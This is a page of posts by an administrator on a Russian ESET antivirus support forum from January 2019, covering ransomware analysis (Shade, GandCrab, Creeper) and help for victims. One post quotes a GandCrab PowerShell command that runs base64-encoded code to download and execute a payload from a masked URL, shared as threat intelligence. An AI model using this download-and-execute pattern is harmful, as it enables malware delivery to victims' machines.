Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.

Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новые продукты компании PRO32.

PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи santy
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 156 157 158 159 160 161 162 163 164 165 166 ... 1784 След.
Поздравляем!
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 31.01.2019 13:17:55
Цитата
Сегодня отмечают день рождения Vitokhv(32),

Поздравляем Vitokhv, одного из активных и давних участников форума ESET с днем рождения.
[ Как создать образ автозапуска? ]
Перейти
Шифровирусы шумной толпою
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 30.01.2019 17:56:08
анализ работы шифратора Ransom.Shade:
https://app.any.run/tasks/65ed86fe-e71f-4949-9a55-4bb1eb0bed08

видим что в реестр добавлен public RSA key

HKEY_LOCAL_MACHINE\SOFTWARE\System32\Configuration
Name:
xpk
Value:
Код
-----BEGIN PUBLIC KEY-----
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA8mn4F2LJ2xbiQ2U0nRya
c1tR+wN6CcLUa3lCLO+4Hj4gGGvPGugPV/9l2cAkeQZahnqlgKG51eaFO1UYdmPs
zyNfi9qlgFndoFL8XsxFHJ4C9BqqlIpD15pglgrubqX0lZGlI27dXh4bu3fA9zrI
ULugLryqMmIId6MDIY2WalR+7Vpq8ATM6VN1/+CKBDEcdHeWsNScgxtKOVa20E60
qOWxzdUoCeMHgMr+Q8kzPQzreyejLbBZL9cXTxstXJVsA64ge/G71oZlLU7j2Ujp
EHkXR4G0I5QBEQu62K0R+cz3FqxP6CN6Pm1MJb8XHkU54FYsVsLsk5nasUMUZ9Uq
5ikgVEO65k7bgwi9nGZsyDlWDOwbGuSRreLAVKeCDiO2jfSBOTH16gIyT9rE7UDj
6SRe2guJhe2sqwXpwgmTJsWffQmzg5vQwWrL4UXUASCWvtODBBTq8jGom9T5Aet/
gsLcsM1ozqI961wp6RZPO1WluzsxvpDT4bCJmc5D6dp/AgMBAAE=
-----END PUBLIC KEY-----
[ Как создать образ автозапуска? ]
Перейти
Не устанавливаются все компоненты
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 30.01.2019 13:43:10
посмотрите в онлайн help статью об установке EFS из командной строки

https://help.eset.com/efsw/7.0/ru-RU/?installation_cmd.html
[ Как создать образ автозапуска? ]
Перейти
поговорить о uVS, Carberp, планете Земля
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 30.01.2019 12:20:30
Цитата
RP55 RP55 написал:
Шифровальщики Петра I
https://topwar.ru/152671-shifrovalschiki-petra-i-chast-pervaja.html

Цитата
Было у петровских криптографов собственное ноу-хау – наличие множества «пустышек» в тексте, то есть знаков шифрованного текста, которым не соответствует никакой знак открытого текста. Эти бессмысленные включения длиной 5-6 знаков увеличивали стойкость шифров, создавая у противника неправильное впечатление о количестве знаком в алфавите открытого текста. «Пустышки» разбивали структурные лингвистические связи открытого текста и изменяли статистические закономерности, то есть именно те свойства текста, которые использовались при дешифровании шифра простой замены. Бессмысленные вставки увеличивали длину кодированного текста по сравнению с открытым, а это значительно усложняло их взаимное сопоставление.

обфускация
https://habr.com/ru/post/255871/
[ Как создать образ автозапуска? ]
Перейти
Торможение компьютера после удаления вируса
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 30.01.2019 08:10:42
добавьте новый образ автозапуска
[ Как создать образ автозапуска? ]
Перейти
файлы зашифровованы с расширением cripton; .crypton, Creeper
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 29.01.2019 17:09:12
Цитата
Сергей Кем написал:
так же сейчас обратил внимание что у меня на сервере есть файл с базами данных postgre в архиве 7z запароленном его тоже невозможно разгадать пароль?
трудно сказать.
вы можете проверить подбор паролей  с помощью утилит от Элкомсофт.
(возможно что пароль окажется несложным)
[ Как создать образ автозапуска? ]
Перейти
Шифровирусы шумной толпою
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 29.01.2019 15:29:04
Новая атака шифратора Shade нацелена на российских бизнес-пользователей

Цитата
В январе 2019 года мы зафиксировали резкий рост числа обнаружений вредоносных почтовых вложений JavaScript (в 2018 году данный вектор атаки использовался минимально). В «новогоднем выпуске» можно выделить рассылку на русском языке, предназначенную для распространения шифратора Shade (он же Troldesh), который детектируется продуктами ESET как Win32/Filecoder.Shade.

https://habr.com/ru/company/eset/blog/437982/
[ Как создать образ автозапуска? ]
Перейти
поговорить о uVS, Carberp, планете Земля
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 29.01.2019 15:24:59
Распространители GandCrab взяли на вооружение метод с командной строкой, содержащей powershell и закодированный в base64 код.

Цитата
cmdline:
powershell -exec bypass -nop -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBl­AGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4A­ZwAoACcAaAB0AHQAcABzADoAL****

https://app.any.run/tasks/309138f6-4541-4bd5-93b4-dbf33f83af6e
[ Как создать образ автозапуска? ]
Перейти
файлы зашифровованы с расширением cripton; .crypton, Creeper
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 29.01.2019 08:33:08
судя по записке о выкупе и зашифрованному файлу:

Creeper
Цитата
Этот вымогатель еще пока изучается.

Изучите топик для дополнительной информации. Образцы зашифрованных и подозрительных файлов понадобятся для дальнейшего изучения.

Опознан как

   ransomnote_email: [email protected]
https://id-ransomware.malwarehunterteam.com/identify.php?case=8740421f73be7400b7cb3b2fd12309a32630269a

по расшифовке файлов напишите в support@esetnod32 при наличие лицензии на продукт ESET

неплохо было бы найти файл шифратора. пока что мало о нем известно.
(и случаев шифрования немного, начиная с 2018г)

http://id-ransomware.blogspot.com/2018/02/creeper-ransomware.html
[ Как создать образ автозапуска? ]
Перейти
файлы зашифровованы с расширением cripton; .crypton, Creeper
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 29.01.2019 08:09:35
просьба стандартная:
если вы открываете новую тему по шифраторам:
добавьте несколько зашифрованных файлов в архиве, + записку о выкупе
+
добавьте образ автозапуска системы, сделанный из зашифрованной системы, если она доступна.
[ Как создать образ автозапуска? ]
Перейти
Пред. 1 ... 156 157 158 159 160 161 162 163 164 165 166 ... 1784 След.